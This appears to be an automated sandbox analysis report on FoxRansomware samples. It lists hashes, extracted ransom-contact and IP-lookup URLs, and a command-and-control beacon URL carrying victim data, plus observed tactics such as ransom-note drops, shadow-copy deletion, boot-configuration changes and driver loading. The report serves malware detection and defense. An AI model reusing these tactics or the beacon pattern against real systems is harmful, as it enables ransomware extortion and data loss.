Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
13-02-2024 05:15
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20231215-en
General
-
Target
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
-
Size
1.2MB
-
MD5
1fa1b6d4b3ed867c1d4baffc77417611
-
SHA1
afb5e385f9cc8910d7a970b6c32b8d79295579da
-
SHA256
91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53
-
SHA512
0600b92914a7489a6428b8e4217e5f24e1d149fc5807d86cc4de91b43be2470a1ddf77093c8732d4371a87fd163cc556e09d11a2c6655382a35a5f5741ae05a5
-
SSDEEP
24576:K/SA+2lraRrjSJR5ezmT1dM9bBkNIDreFqO:2Xl9Ife
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#FOX_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\All Users\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\th\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\be\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\Saved Games\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Office\root\vfs\Fonts\private\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\Settings\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EVRGREEN\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cy-GB\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Office\root\Office16\FPA_f33\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ca-es\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\es-es\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\es-es\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\ProgramData\Microsoft\Diagnosis\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\1033\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Office\root\Templates\1033\GettingStarted16\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\da\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\es\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\nl-nl\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zu\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe HTTP URL 136 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=ZHCNTALV|Admin&sid=OOZVNLNk0Kq10FEB&phase=45AA0F52559CEC4B|11826|6GB Process not Found File created C:\Program Files\Microsoft Office\root\Licenses\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jre-1.8\lib\management\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\Settings\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files\Java\jre-1.8\lib\amd64\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\#FOX_README#.rtf 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 10064 bcdedit.exe 332 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 148 5264 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS HPTbJaR964.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" HPTbJaR964.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 3 IoCs
pid Process 3528 NWqByALz.exe 8860 HPTbJaR9.exe 6812 HPTbJaR964.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 10140 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral10/files/0x0006000000023239-19985.dat upx behavioral10/memory/8860-20177-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 30 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Music\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-1168293393-3419776239-306423207-1000\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Videos\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1168293393-3419776239-306423207-1000\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Links\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Music\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Users\Public\Documents\desktop.ini 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\Z: HPTbJaR964.exe File opened (read-only) \??\V: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\S: HPTbJaR964.exe File opened (read-only) \??\Y: HPTbJaR964.exe File opened (read-only) \??\G: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\X: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\H: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\G: HPTbJaR964.exe File opened (read-only) \??\Y: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\M: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\J: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\A: HPTbJaR964.exe File opened (read-only) \??\M: HPTbJaR964.exe File opened (read-only) \??\U: HPTbJaR964.exe File opened (read-only) \??\X: HPTbJaR964.exe File opened (read-only) \??\O: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\U: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\T: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\K: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\B: HPTbJaR964.exe File opened (read-only) \??\J: HPTbJaR964.exe File opened (read-only) \??\K: HPTbJaR964.exe File opened (read-only) \??\P: HPTbJaR964.exe File opened (read-only) \??\W: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\Q: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\L: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\H: HPTbJaR964.exe File opened (read-only) \??\Q: HPTbJaR964.exe File opened (read-only) \??\R: HPTbJaR964.exe File opened (read-only) \??\R: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\S: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\N: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\I: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\E: HPTbJaR964.exe File opened (read-only) \??\I: HPTbJaR964.exe File opened (read-only) \??\L: HPTbJaR964.exe File opened (read-only) \??\N: HPTbJaR964.exe File opened (read-only) \??\Z: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened (read-only) \??\V: HPTbJaR964.exe File opened (read-only) \??\W: HPTbJaR964.exe File opened (read-only) \??\T: HPTbJaR964.exe File opened (read-only) \??\O: HPTbJaR964.exe File opened (read-only) \??\P: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 147 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\MyZplpC7.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Retail-ppd.xrm-ms 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\VBAJET32.DLL 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\Microsoft.Build.Engine.resources.dll 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_selected_18.svg 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview2x.png 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\AppStore_icon.svg 